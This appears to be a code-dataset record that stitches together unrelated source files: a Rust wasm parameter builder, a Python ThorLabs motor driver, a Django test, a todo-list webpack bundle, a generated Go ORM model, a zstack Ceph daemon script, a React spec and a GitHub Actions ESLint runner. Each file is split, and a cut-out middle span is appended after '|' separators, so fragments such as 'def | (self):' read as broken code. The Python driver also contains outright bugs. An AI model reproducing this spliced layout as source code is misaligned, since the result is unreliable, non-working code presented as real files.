let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
"StorageResource" => {
let mut spec: models::StorageResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of storage resource create request
// from metadata
spec.cloud_provider = provider;
let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
"NetworkResource" => {
let mut spec: models::NetworkResourceCreateRequest =
serde_json::from_str(&json_spec).unwrap();
// Update cloud provider info of network resource create request
// from metadata
spec.cloud_provider = provider;
let param: Value = match op.as_str() {
"create" => {
let v: Value =
serde_json::from_str(&serde_json::to_string(&spec).unwrap()).unwrap();
v
}
"delete" => {
let opt = DeleteOpts::new(&spec.name, &default_cp, false, false);
let v: Value =
serde_json::from_str(&serde_json::to_string(&opt).unwrap()).unwrap();
v
}
_ => {
log(&format!("operation {} is not supported!", op));
json!(null)
}
};
js.set_params(param);
}
_ => log(&format!("resource kind {} is not supported!", k)),
};
JsValue::from_serde(&js).unwrap()
} |
|
ThorLabs_controller_rs232_driver.py | #!/bin/env python
"""
ThorLabs TDC001 and KDC001 cubes Low Level code.
This code specifies communication protocola for T snd K cubes.
Valentyn Stadnytskyi
[email protected]
The communication protocols:
https://www.thorlabs.com/Software/Motion%20Control/APT_Communications_Protocol.pdf issue 20
"""
from time import sleep, time
from numpy import zeros, ones, mean, std, sign
from serial import Serial
from struct import pack, unpack
from pdb import pm
import logging
from logging import debug, info, warn, error
class Motor(object):
def __init__(self):
self.baudrate = 115200
self.controller = ''
self.motor = ''
self.last_communiction = {}
self.port = None
def init(self, serial_number = '', controller_type = None, motor_type = None):
if controller_type is None:
raise Exception('The controller type is not specified!')
else:
self.controller_type = controller_type
if motor_type is None:
raise Exception('The motor type is not specified!')
else:
self.motor_type = motor_type
if serial_number != "":
port_name = self.get_port(serial_number = serial_number)
ser = self.get_serial_object(port_name = port_name)
if ser is not None:
self.port = ser
self.port.timeout = 0.4
self.serial_number = serial_number
else:
self.port = None
print('No serial device with serial number {}'.format(serial_number))
else:
self.port = None
print('Serial Number has to be specified')
def list_all(self):
"""
lists and returns all com ports with the manufacturer field equal to 'ThorLabs'
"""
import serial.tools.list_ports
lst = serial.tools.list_ports.comports()
available_ports = []
for item in lst:
debug('Manufacturer of this motor is {}'.format(item.manufacturer))
if item.manufacturer == 'Thorlabs':
available_ports.append(item)
return available_ports
def get_port(self, serial_number = None):
"""
returns the name of the serial port for the ThorLabs motor controller with specified serial_number
"""
def is_port_open(port):
from serial import Serial
import platform
if platform.system() == 'Linux':
prefix = '/dev/'
else:
prefix = ''
ser = Serial(prefix+port, baudrate=115200, bytesize = 8, parity='N', stopbits=1, timeout=1)
ser.isOpen()
import platform
if platform.system() == 'Linux':
prefix = '/dev/'
else:
prefix = ''
lst = self.list_all()
port_name = ''
if serial_number != None:
for item in lst:
if item.serial_number == str(serial_number):
port_name = prefix+item.name
return port_name
def get_serial_object(self,port_name):
"connects to a given port name /dev/ttyUSB1 in case of linux"
from serial import Serial
ser = Serial(port_name, baudrate=self.baudrate, bytesize = 8, parity='N', stopbits=1, timeout=1)
return ser
def initialization(self):
"""initialization function"""
#this will turn on message to be send upon completion of the move.
#I ran this command and it turned off reply to identify
#self.port.write(pack('BBBBBB',0x6C,0x04,0x00,0x00,0x80,0x01))
#suspend end of motion message
#self.port.write(pack('BBBBBB',0x6B,0x04,0x00,0x00,0x21,0x01))
"""MGMSG_HW_NO_FLASH_PROGRAMMING"""
#self.port.write()
pass
def read(self, N = 0):
if N ==0:
result = None
else:
result = self.port.read(N)
return result
def write(self,command):
self.flush()
self.port.write(command)
def query_line(self,command, length = None):
"""write read command"""
self.flush()
self.write(command)
while self.port.in_waiting < 1:
sleep(0.1)
result = self.port.readline()
return result
def query(self,command, length = None):
"""write read command"""
self.flush()
self.write(command + '\r')
if length == None:
result = None
else:
while self.port.in_waiting < length:
sleep(0.1)
result = self.read(N = length)
return result
def close(self):
self.port.close()
del self.port
def waiting(self):
return [self.port.in_waiting,self.port.out_waiting]
def flush(self):
self.port.reset_input_buffer()
self.port.reset_output_buffer()
def blink(self):
"""
submits blink command to the controller
tested for
"""
if self.controller_type == 'T':
self.write(pack('B'*6,0x23,0x02,0x00,0x00,0x50,0x01))
flag = True
else:
flag = False
warn('the controller type is not specified')
def identify(self):
"""
This command is independent on the controller type
page 28-29 of the communication protocol file
send 6 bytes 05 00 00 00 11 01
back 90 bytes
0-5 bytes - header 06 00 54 00 d| s
6-9 bytes - <--Serial Number-->
10-17 bytes- <--Model Number-->
18-19 bytes - <--Type-->
20-23 bytes - <--Firmware Version-->
24-83 bytes - <--For internal use only-->
84-85 bytes - <--HW Version-->
86-87 bytes - <--Mod State-->
88-89 bytes - <--nchs--> "mnumber of channels"
tested fot TDC001 cubes
"""
from struct import pack
flag = True
if self.controller_type == 'T':
command = pack('BBBBBB',0x05,0x00,0x00,0x00,0x50,0x01)
else:
flag = False
if flag:
result = self.query_line(command,90)
self.full_result = result
Header = result[0:6]
SerialNumber = unpack('i',result[6:10]) #unpack('L',result[6:10])
ModelNumber = result[10:18]
Type = unpack('h',result[18:20])
FirmwareVersion = self.my_unpack(result,20,23)
HWVersion = result[84:86]
ForInternalUseOnly = result[24:84]
ModState = self.my_unpack(result,86,87)
nchs = self.my_unpack(result,88,89)
msg = ""
debug('The result of identify command: \n Header: {} \n Serial Number: {} \
\n Model Number: {} \n Type: {} \n Firmware Version: {} \n Mod State: {} \
\n nchs: {} \n For Internal Use Only: \
\n {}'.format(Header, SerialNumber,ModelNumber,Type,FirmwareVersion, ModState,nchs,ForInternalUseOnly))
res_dic = {}
res_dic['Header'] = Header
res_dic['SerialNumber'] = SerialNumber
res_dic['ModelNumber'] = ModelNumber
res_dic['Type'] = Type
res_dic['FirmwareVersion'] = FirmwareVersion
res_dic['HWVersion'] = HWVersion
res_dic['ForInternalUseOnly'] = ForInternalUseOnly
res_dic['ModState'] = ModState
res_dic['nchs'] = nchs
else:
res_dic = {}
res_dic['Header'] = None
res_dic['SerialNumber'] = None
res_dic['ModelNumber'] = None
res_dic['Type'] = None
res_dic['FirmwareVersion'] = None
res_dic['HWVersion'] = None
res_dic['ForInternalUseOnly'] = None
res_dic['ModState'] = None
res_dic['nchs'] = None
return res_dic
def move_abs(self,new_pos):
flag = False
comment = None
if self.controller_type == 'T':
c_header = pack('BBBBBB',0x53,0x04,0x06,0x00,0x80,0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',new_pos)
command = c_header + c_channel + c_distance
response = self.query_line(command,20)
res_pos = unpack('i',response[8:12])
res_enc = unpack('i',response[12:16])
res_status_bits = response[16:20]
flag = True
return flag, comment
def move_relative(self,delta_pos):
"""
move relative
+delta_pos will move positive by that number
-delta_pos will move negative by that number
tested for TDC001 cube.
"""
flag = False
comment = None
if self.controller_type == 'T':
c_header = pack('B'*6,0x48, 0x04, 0x06, 0x00, 0xA2, 0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',delta_pos)
command = c_header + c_channel + c_distance
#print('command sent %r' % command)
response = self.query_line(command,20)
res_pos = unpack('i',response[8:12])
res_enc = unpack('i',response[12:16])
res_status_bits = response[16:20]
debug('res_pos:{} , res_enc:{}, res_status_bits:{}'.format(res_pos,res_enc,res_status_bits))
flag = True
comment = '' + str(response)
else:
warn('unknown controller type')
reply = {}
reply['flag'] = flag
reply['comment'] = comment
return reply
def get_position(self):
"""FIXIT: add description"""
if self.controller == 'T':
command = pack('BBBBBB',0x11,0x04,0x01,0x00,0x21,0x01)
#print('Get position command sent %r' % command)
response = self.query(command,12)
res_header = response[0:6]
res_chan_ident = response[6:8]
res_encoder_counts = response[8:12]
self.last_communiction['command'] = command
self.last_communiction['response'] = response
return unpack('i',res_encoder_counts)[0]
else:
return None
def set_position(self,value):
"""
"""
c_header = pack('BBBBBB',0x09,0x04,0x06,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00)
c_distance = pack('i',value)
command = c_header + c_channel + c_distance
self.write(command)
def home(self):
'''MGMSG_MOT_MOVE_HOME'''
flag = False
if self.motor == 'T':
self.write(pack('B'*6,0x43,0x04,0x00,0x00,0xA2,0x01))
while self.port.in_waiting == 0:
sleep(0.1)
res = self.read(6)
if res == pack('BBBBBB',0x44,0x04,0x01,0x00,0x01,0x80):
print('%r' % res)
flag = True
else:
|
return flag, res #returns True of home was succesfully executed.
def my_unpack(self,var,f,t):
return unpack('B'*len(var[f:t+1]),var[f:t+1])
def hex_to_chr(self, var):
for i in var:
print(i)
string =+ chr(var)
return string
"""Potentially useful commands. Haven;t been used or extensively tested"""
def set_position_2(self,value):
c_header = pack('BBBBBB',0x10,0x04,0x06,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00)
Pos = self.get_position()
c_distance = pack('i',value)
command = c_header + c_channel + c_distance
response = self.query(command)
return response
def home_parameters_set(self,home_dir,limit_switch,home_velocity,offset_distance):
""" MGMSG_MOT_SET_HOMEPARAMS 0x0440 """
if self.motor == 'A':
raise ValueError('This is AutoOptics motor and it does not have homing option!')
else:
c_header = pack('B'*6,0x40,0x04,0x0E,0x00,0xA2,0x01)
c_channel = pack('BB',0x01,0x00) #<---this is always the same for TDC001 cubes.
c_home_dir = pack('h',home_dir)
c_limit_switch = pack('h',limit_switch)
c_home_velocity = pack('l',home_velocity)
c_offset_distance = pack('l',offset_distance)
command = c_header + c_channel + c_home_dir + c_limit_switch + c_home_velocity + c_offset_distance
response = self.query(command)
def home_parameters_get(self):
""" MGMSG_MOT_GET_HOMEPARAMS 0x0442 """
from struct import unpack
command = pack('B'*6,0x41,0x04,0x01,0x00,0x64,0x73)
response = self.query(command,20)
res = {}
res['header'] = response[0:7]
res['chan_ident'] = unpack('h',response[6:8])
res['home_dir']= unpack('h',response[8:10])
res['limit_switch'] = unpack('b',response[10:11])
res['home_velocity'] = unpack('i',response[12:16])
res['offset_distance'] = unpack('i',response[16:20])
return res
def run_test1(self,N):
from random import random
from time import sleep, time
lst = []
to = []
for i in range(N):
start = time()
prev = self.get_position()
goto = int(random()*25*512.*67.)
self.move_abs(goto)
while abs(goto - self.get_position()) > 3:
sleep(0.3)
arrived = self.get_position()
print [time()-start,round(goto/(512.*67.),2),round(arrived/(512.*67.),2),round((goto-prev)/(512.*67.*(time()-start)),2)]
sleep(5)
if __name__ == "__main__":
from tempfile import gettempdir
import logging
logging.basicConfig(#filename=gettempdir()+'/syringe_pump_DL.log',
level=logging.INFO, format="%(asctime)s %(levelname)s: %(message)s")
print('This is a Low Level python script providing Device Level with basic communication commands')
motors = []
motors.append(Motor())
#motors.append(Motor())
#motors.append(Motor())
#motors[0].init('27254090')
#motors[1].init('27254025')
motors[0].init('83825160', controller_type = 'T', motor_type = 'T')
for motor in motors:
motor.blink()
for motor in motors:
reply = motor.identify()
print(reply)
#for motor in motors: motor.close()
#print('all ports are closed')
| print(res) |
test_management_commands.py | from io import StringIO
from django.core.management import call_command
from django.test import TestCase
class InventoryManagementCommandsTest(TestCase):
def | (self):
out = StringIO()
call_command('cleanup_inventory_history', stdout=out)
result = out.getvalue()
self.assertIn('min date', result)
self.assertIn('machine_snapshot_commit', result)
def test_cleanup_inventory_history_quiet(self):
out = StringIO()
call_command('cleanup_inventory_history', '-q', stdout=out)
self.assertEqual("", out.getvalue())
| test_cleanup_inventory_history |
bundle.js | /******/ (() => { // webpackBootstrap
var __webpack_exports__ = {};
function _toConsumableArray(arr) { return _arrayWithoutHoles(arr) || _iterableToArray(arr) || _unsupportedIterableToArray(arr) || _nonIterableSpread(); }
function _nonIterableSpread() { throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }
function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); if (n === "Arguments" || /^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)) return _arrayLikeToArray(o, minLen); }
function _iterableToArray(iter) { if (typeof Symbol !== "undefined" && iter[Symbol.iterator] != null || iter["@@iterator"] != null) return Array.from(iter); }
function _arrayWithoutHoles(arr) { if (Array.isArray(arr)) return _arrayLikeToArray(arr); }
function _arrayLikeToArray(arr, len) { if (len == null || len > arr.length) len = arr.length; for (var i = 0, arr2 = new Array(len); i < len; i++) { arr2[i] = arr[i]; } return arr2; }
var todoList = function todoList() {
var addBtn = document.getElementById('addBtn');
var inputTodo = document.getElementById('inputTodo');
var clearBtn = document.getElementById('clearBtn');
var ulTodo = document.getElementById('todoList');
var listBox = document.getElementById('app');
addBtn.addEventListener('click', function (e) {
return clickAddBtn(e);
});
clearBtn.addEventListener('click', function () {
return clearTodoList();
});
ulTodo.addEventListener('click', function (e) {
return clickTodoBtn(e);
}); // 로컬스토리지 불러오기 & 저장하기
var getLocalStorage = function getLocalStorage() {
return JSON.parse(localStorage.getItem('todo')) || [];
};
var setLocalStorage = function setLocalStorage(list) {
return localStorage.setItem('todo', JSON.stringify(list));
}; // 클릭 이벤트 : 리스트 추가 실행
var clickAddBtn = function clickAddBtn(e) {
e.preventDefault();
if (inputTodo.value !== '') addTodo();
}; // 리스트 추가
var addTodo = function addTodo() {
var newTodo = {
text: inputTodo.value,
checked: false
};
var newArr = [].concat(_toConsumableArray(getLocalStorage()), [newTodo]);
inputTodo.value = '';
showTodoList(newArr);
}; // 리스트 렌더링 & 로컬스토리지 저장 실행
var showTodoList = function showTodoList(list) {
setLocalStorage(list);
renderTodoList(list);
sectionInactive(list);
}; // 리스트 렌더링
var renderTodoList = function renderTodoList(list) {
ulTodo.innerHTML = list.map(function (todo, i) {
return "<li class=\"todo ".concat(todo.checked === true ? 'checked' : '', "\" data-num=\"").concat(i, "\">\n <button id=\"checkBtn\"><i class=\"fa-solid fa-check\"></i></button>\n <span>").concat(todo.text, "</span>\n <button id=\"deleteBtn\"><i class=\"fa-solid fa-xmark\"></i></button\n </li>");
}).join('');
}; // 리스트가 없는 경우 secton에 display : none 처리
var sectionInactive = function sectionInactive(list) {
return list.length === 0 ? listBox.classList.add('inactive') : listBox.classList.remove('inactive');
}; // 초기 화면 로딩
var init = function init() {
return showTodoList(getLocalStorage());
};
init(); // 클릭 이벤트 : 해당 투두 체크 또는 삭제
var clickTodoBtn = function clickTodoBtn(e) {
if (e.target.id === 'checkBtn') checkTodo(e);
if (e.target.id === 'deleteBtn') deleteTodo(e);
}; // 해당 투두 삭제
var deleteTodo = function deleteTodo(e) {
var deleteNum = e.target.closest('li').dataset.num;
var newArr = getLocalStorage().filter(function (todo, i) {
return i !== Number(deleteNum);
});
showTodoList(newArr);
}; // 해당 투두 체크 표시
| var checkNum = e.target.closest('li').dataset.num;
var savedArr = getLocalStorage();
var newArr = _toConsumableArray(savedArr);
newArr[checkNum].checked = !savedArr[checkNum].checked;
showTodoList(newArr);
}; // 클릭이벤트 : 투두리스트 전체 삭제 실행
var clearTodoList = function clearTodoList() {
return showTodoList([]);
};
};
window.addEventListener('DOMContentLoaded', function () {
return todoList();
});
/******/ })()
; | var checkTodo = function checkTodo(e) { |
pms_product_category_attribute_relation_model.go | // ==========================================================================
// This is auto-generated by gf cli tool. You may not really want to edit it.
// ==========================================================================
package pms_product_category_attribute_relation
import (
"database/sql"
"github.com/gogf/gf/database/gdb"
"github.com/gogf/gf/frame/g"
"github.com/gogf/gf/frame/gmvc"
"time"
)
// arModel is a active record design model for table pms_product_category_attribute_relation operations.
type arModel struct {
gmvc.M
}
var (
// Table is the table name of pms_product_category_attribute_relation.
Table = "pms_product_category_attribute_relation"
// Model is the model object of pms_product_category_attribute_relation.
Model = &arModel{g.DB("default").Table(Table).Safe()}
// Columns defines and stores column names for table pms_product_category_attribute_relation.
Columns = struct {
Id string //
ProductCategoryId string //
ProductAttributeId string //
}{
Id: "id",
ProductCategoryId: "product_category_id",
ProductAttributeId: "product_attribute_id",
}
)
// FindOne is a convenience method for Model.FindOne.
// See Model.FindOne.
func FindOne(where ...interface{}) (*Entity, error) {
return Model.FindOne(where...)
}
// FindAll is a convenience method for Model.FindAll.
// See Model.FindAll.
func FindAll(where ...interface{}) ([]*Entity, error) {
return Model.FindAll(where...)
}
// FindValue is a convenience method for Model.FindValue.
// See Model.FindValue.
func FindValue(fieldsAndWhere ...interface{}) (gdb.Value, error) {
return Model.FindValue(fieldsAndWhere...)
}
// FindArray is a convenience method for Model.FindArray.
// See Model.FindArray.
func FindArray(fieldsAndWhere ...interface{}) ([]gdb.Value, error) {
return Model.FindArray(fieldsAndWhere...)
}
// FindCount is a convenience method for Model.FindCount.
// See Model.FindCount.
func | (where ...interface{}) (int, error) {
return Model.FindCount(where...)
}
// Insert is a convenience method for Model.Insert.
func Insert(data ...interface{}) (result sql.Result, err error) {
return Model.Insert(data...)
}
// InsertIgnore is a convenience method for Model.InsertIgnore.
func InsertIgnore(data ...interface{}) (result sql.Result, err error) {
return Model.InsertIgnore(data...)
}
// Replace is a convenience method for Model.Replace.
func Replace(data ...interface{}) (result sql.Result, err error) {
return Model.Replace(data...)
}
// Save is a convenience method for Model.Save.
func Save(data ...interface{}) (result sql.Result, err error) {
return Model.Save(data...)
}
// Update is a convenience method for Model.Update.
func Update(dataAndWhere ...interface{}) (result sql.Result, err error) {
return Model.Update(dataAndWhere...)
}
// Delete is a convenience method for Model.Delete.
func Delete(where ...interface{}) (result sql.Result, err error) {
return Model.Delete(where...)
}
// As sets an alias name for current table.
func (m *arModel) As(as string) *arModel {
return &arModel{m.M.As(as)}
}
// TX sets the transaction for current operation.
func (m *arModel) TX(tx *gdb.TX) *arModel {
return &arModel{m.M.TX(tx)}
}
// Master marks the following operation on master node.
func (m *arModel) Master() *arModel {
return &arModel{m.M.Master()}
}
// Slave marks the following operation on slave node.
// Note that it makes sense only if there's any slave node configured.
func (m *arModel) Slave() *arModel {
return &arModel{m.M.Slave()}
}
// LeftJoin does "LEFT JOIN ... ON ..." statement on the model.
func (m *arModel) LeftJoin(joinTable string, on string) *arModel {
return &arModel{m.M.LeftJoin(joinTable, on)}
}
// RightJoin does "RIGHT JOIN ... ON ..." statement on the model.
func (m *arModel) RightJoin(joinTable string, on string) *arModel {
return &arModel{m.M.RightJoin(joinTable, on)}
}
// InnerJoin does "INNER JOIN ... ON ..." statement on the model.
func (m *arModel) InnerJoin(joinTable string, on string) *arModel {
return &arModel{m.M.InnerJoin(joinTable, on)}
}
// Fields sets the operation fields of the model, multiple fields joined using char ','.
func (m *arModel) Fields(fields string) *arModel {
return &arModel{m.M.Fields(fields)}
}
// FieldsEx sets the excluded operation fields of the model, multiple fields joined using char ','.
func (m *arModel) FieldsEx(fields string) *arModel {
return &arModel{m.M.FieldsEx(fields)}
}
// Option sets the extra operation option for the model.
func (m *arModel) Option(option int) *arModel {
return &arModel{m.M.Option(option)}
}
// OmitEmpty sets OPTION_OMITEMPTY option for the model, which automatically filers
// the data and where attributes for empty values.
func (m *arModel) OmitEmpty() *arModel {
return &arModel{m.M.OmitEmpty()}
}
// Filter marks filtering the fields which does not exist in the fields of the operated table.
func (m *arModel) Filter() *arModel {
return &arModel{m.M.Filter()}
}
// Where sets the condition statement for the model. The parameter <where> can be type of
// string/map/gmap/slice/struct/*struct, etc. Note that, if it's called more than one times,
// multiple conditions will be joined into where statement using "AND".
// Eg:
// Where("uid=10000")
// Where("uid", 10000)
// Where("money>? AND name like ?", 99999, "vip_%")
// Where("uid", 1).Where("name", "john")
// Where("status IN (?)", g.Slice{1,2,3})
// Where("age IN(?,?)", 18, 50)
// Where(User{ Id : 1, UserName : "john"})
func (m *arModel) Where(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.Where(where, args...)}
}
// And adds "AND" condition to the where statement.
func (m *arModel) And(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.And(where, args...)}
}
// Or adds "OR" condition to the where statement.
func (m *arModel) Or(where interface{}, args ...interface{}) *arModel {
return &arModel{m.M.Or(where, args...)}
}
// Group sets the "GROUP BY" statement for the model.
func (m *arModel) Group(groupBy string) *arModel {
return &arModel{m.M.Group(groupBy)}
}
// Order sets the "ORDER BY" statement for the model.
func (m *arModel) Order(orderBy string) *arModel {
return &arModel{m.M.Order(orderBy)}
}
// Limit sets the "LIMIT" statement for the model.
// The parameter <limit> can be either one or two number, if passed two number is passed,
// it then sets "LIMIT limit[0],limit[1]" statement for the model, or else it sets "LIMIT limit[0]"
// statement.
func (m *arModel) Limit(limit ...int) *arModel {
return &arModel{m.M.Limit(limit...)}
}
// Offset sets the "OFFSET" statement for the model.
// It only makes sense for some databases like SQLServer, PostgreSQL, etc.
func (m *arModel) Offset(offset int) *arModel {
return &arModel{m.M.Offset(offset)}
}
// Page sets the paging number for the model.
// The parameter <page> is started from 1 for paging.
// Note that, it differs that the Limit function start from 0 for "LIMIT" statement.
func (m *arModel) Page(page, limit int) *arModel {
return &arModel{m.M.Page(page, limit)}
}
// Batch sets the batch operation number for the model.
func (m *arModel) Batch(batch int) *arModel {
return &arModel{m.M.Batch(batch)}
}
// Cache sets the cache feature for the model. It caches the result of the sql, which means
// if there's another same sql request, it just reads and returns the result from cache, it
// but not committed and executed into the database.
//
// If the parameter <duration> < 0, which means it clear the cache with given <name>.
// If the parameter <duration> = 0, which means it never expires.
// If the parameter <duration> > 0, which means it expires after <duration>.
//
// The optional parameter <name> is used to bind a name to the cache, which means you can later
// control the cache like changing the <duration> or clearing the cache with specified <name>.
//
// Note that, the cache feature is disabled if the model is operating on a transaction.
func (m *arModel) Cache(duration time.Duration, name ...string) *arModel {
return &arModel{m.M.Cache(duration, name...)}
}
// Data sets the operation data for the model.
// The parameter <data> can be type of string/map/gmap/slice/struct/*struct, etc.
// Eg:
// Data("uid=10000")
// Data("uid", 10000)
// Data(g.Map{"uid": 10000, "name":"john"})
// Data(g.Slice{g.Map{"uid": 10000, "name":"john"}, g.Map{"uid": 20000, "name":"smith"})
func (m *arModel) Data(data ...interface{}) *arModel {
return &arModel{m.M.Data(data...)}
}
// All does "SELECT FROM ..." statement for the model.
// It retrieves the records from table and returns the result as []*Entity.
// It returns nil if there's no record retrieved with the given conditions from table.
//
// The optional parameter <where> is the same as the parameter of Model.Where function,
// see Model.Where.
func (m *arModel) All(where ...interface{}) ([]*Entity, error) {
all, err := m.M.All(where...)
if err != nil {
return nil, err
}
var entities []*Entity
if err = all.Structs(&entities); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entities, nil
}
// One retrieves one record from table and returns the result as *Entity.
// It returns nil if there's no record retrieved with the given conditions from table.
//
// The optional parameter <where> is the same as the parameter of Model.Where function,
// see Model.Where.
func (m *arModel) One(where ...interface{}) (*Entity, error) {
one, err := m.M.One(where...)
if err != nil {
return nil, err
}
var entity *Entity
if err = one.Struct(&entity); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entity, nil
}
// FindOne retrieves and returns a single Record by Model.WherePri and Model.One.
// Also see Model.WherePri and Model.One.
func (m *arModel) FindOne(where ...interface{}) (*Entity, error) {
one, err := m.M.FindOne(where...)
if err != nil {
return nil, err
}
var entity *Entity
if err = one.Struct(&entity); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entity, nil
}
// FindAll retrieves and returns Result by by Model.WherePri and Model.All.
// Also see Model.WherePri and Model.All.
func (m *arModel) FindAll(where ...interface{}) ([]*Entity, error) {
all, err := m.M.FindAll(where...)
if err != nil {
return nil, err
}
var entities []*Entity
if err = all.Structs(&entities); err != nil && err != sql.ErrNoRows {
return nil, err
}
return entities, nil
}
// Chunk iterates the table with given size and callback function.
func (m *arModel) Chunk(limit int, callback func(entities []*Entity, err error) bool) {
m.M.Chunk(limit, func(result gdb.Result, err error) bool {
var entities []*Entity
err = result.Structs(&entities)
if err == sql.ErrNoRows {
return false
}
return callback(entities, err)
})
}
// LockUpdate sets the lock for update for current operation.
func (m *arModel) LockUpdate() *arModel {
return &arModel{m.M.LockUpdate()}
}
// LockShared sets the lock in share mode for current operation.
func (m *arModel) LockShared() *arModel {
return &arModel{m.M.LockShared()}
} | FindCount |
cdaemon.py | '''
@author: frank
'''
import sys, os, os.path
from zstacklib.utils import log
from zstacklib.utils import linux
import zstacklib.utils.iptables as iptables
pidfile = '/var/run/zstack/ceph-primarystorage.pid'
log.configure_log('/var/log/zstack/ceph-primarystorage.log')
logger = log.get_logger(__name__)
import cephagent
def prepare_pid_dir(path):
pdir = os.path.dirname(path)
if not os.path.isdir(pdir):
os.makedirs(pdir)
def main():
usage = 'usage: python -c "from cephprimarystorage import cdaemon; cdaemon.main()" start|stop|restart'
if len(sys.argv) != 2 or not sys.argv[1] in ['start', 'stop', 'restart']:
print usage
sys.exit(1)
global pidfile
prepare_pid_dir(pidfile)
try:
iptc = iptables.from_iptables_save()
iptc.add_rule('-A INPUT -p tcp -m tcp --dport 7762 -j ACCEPT')
iptc.iptable_restore()
cmd = sys.argv[1]
agentdaemon = cephagent.CephDaemon(pidfile)
if cmd == 'start':
logger.debug('zstack-ceph-primarystorage starts')
agentdaemon.start()
elif cmd == 'stop': | elif cmd == 'restart':
logger.debug('zstack-ceph-primarystorage restarts')
agentdaemon.restart()
sys.exit(0)
except Exception:
logger.warning(linux.get_exception_stacktrace())
sys.exit(1)
if __name__ == '__main__':
main() | logger.debug('zstack-ceph-primarystorage stops')
agentdaemon.stop() |
noOp.spec.tsx | import * as React from "react";
import { assert } from "chai";
import { shallow } from "enzyme";
import assemble from "./assemble";
import noOp from "./noOp";
import Component from "../test/component";
describe("noOp", () => { | c: 3,
};
const composable = noOp;
const Assembly = assemble(composable)(Component);
const wrapper = shallow(<Assembly {...inOut} />);
assert.deepEqual(wrapper.props(), inOut);
});
}); | it("should not alter Component", () => {
const inOut = {
a: 1,
b: 2, |
index.js | #!/usr/bin/env node
/* eslint-disable no-console */
/* eslint-disable camelcase */ // github API convention
/* eslint-env node */
const exitWithError = err => {
console.error('Error', err.stack);
if (err.data) {
console.error(err.data);
}
process.exit(1);
},
{
GITHUB_SHA, GITHUB_EVENT_PATH, GITHUB_TOKEN, GITHUB_WORKSPACE
} = process.env;
if (GITHUB_TOKEN == null) {
exitWithError(new Error('Missing Github token'));
}
if (GITHUB_EVENT_PATH == null) {
exitWithError(new Error('Can not find GITHUB_EVENT_PATH - is this run in Github Actions?'));
}
const https = require('https'),
request = (url, options) =>
new Promise((resolve, reject) => {
const req = https
.request(url, options, res => {
let data = '';
res.on('data', chunk => {
data += chunk;
});
res.on('end', () => {
if (res.statusCode >= 400) {
const err = new Error(`Received status code ${ res.statusCode }`);
err.response = res;
err.data = data;
reject(err);
} else {
resolve({
res,
data: JSON.parse(data)
});
}
});
})
.on('error', reject);
if (options.body) {
req.end(JSON.stringify(options.body));
} else {
req.end();
}
}),
event = require(GITHUB_EVENT_PATH),
{
repository: {
name: repo,
owner: {
login: owner
}
}
} = event,
checkName = 'ESLint check';
let checkSha = GITHUB_SHA;
if (event.pull_request) {
checkSha = event.pull_request.head.sha;
}
const headers = {
'Content-Type': 'application/json',
Accept: 'application/vnd.github.antiope-preview+json',
Authorization: `Bearer ${ GITHUB_TOKEN }`,
'User-Agent': 'eslint-action'
},
createCheck = async () => {
const { data } = await request(`https://api.github.com/repos/${ owner }/${ repo }/check-runs`, {
method: 'POST',
headers,
body: {
name: checkName,
head_sha: checkSha,
status: 'in_progress',
started_at: (new Date()).toISOString()
}
});
return data.id;
},
getChangedFiles = async targetBranch => {
const util = require('util'),
exec = util.promisify(require('child_process').exec),
{ stdout } = await exec(
`git diff origin/${targetBranch}... --name-only --diff-filter=d`
);
return stdout.trim().split('\n');
},
eslint = async () => {
const partialLinting = process.env.PARTIAL_LINTING; //false
let files = ['.'];
if (partialLinting && event.pull_request) {
const branch = event.pull_request.base.ref;
files = await getChangedFiles(branch);
}
const eslint = require('eslint'),
cli = new eslint.CLIEngine(),
report = cli.executeOnFiles(files),
// fixableErrorCount, fixableWarningCount are available too
levels = ['notice', 'warning', 'failure'];
const annotations = report.results.reduce((annoList, result) => {
const path = result.filePath.substring(GITHUB_WORKSPACE.length + 1);
return annoList.concat(result.messages.map(m => {
const singleLine = m.line === m.endLine || m.endLine === undefined;
return {
path,
start_column: singleLine ? m.column : undefined,
end_column: singleLine ? m.endColumn || m.column : undefined,
start_line: m.line,
end_line: m.endLine || m.line,
annotation_level: levels[m.severity],
// title: `${ path }#L${ m.line }`,
// raw_details: 'Nothing much',
message: `${ m.ruleId }: ${ m.message }`
};
}));
}, []),
{
errorCount, warningCount
} = report;
return {
annotations,
errorCount,
warningCount
};
},
updateCheck = async (id, opts = {}) =>
await request(`https://api.github.com/repos/${ owner }/${ repo }/check-runs/${ id }`, {
method: 'PATCH',
headers,
body: {
name: checkName,
head_sha: checkSha,
...opts
}
}),
updateChecks = async (id, {
errorCount, warningCount, annotations
}) => {
const chunkSize = 50,
chunksLength = Math.ceil(annotations.length / chunkSize);
await Promise.all(new Array(chunksLength).fill().map((_, i) => updateCheck(id, {
status: 'in_progress',
output: {
title: checkName,
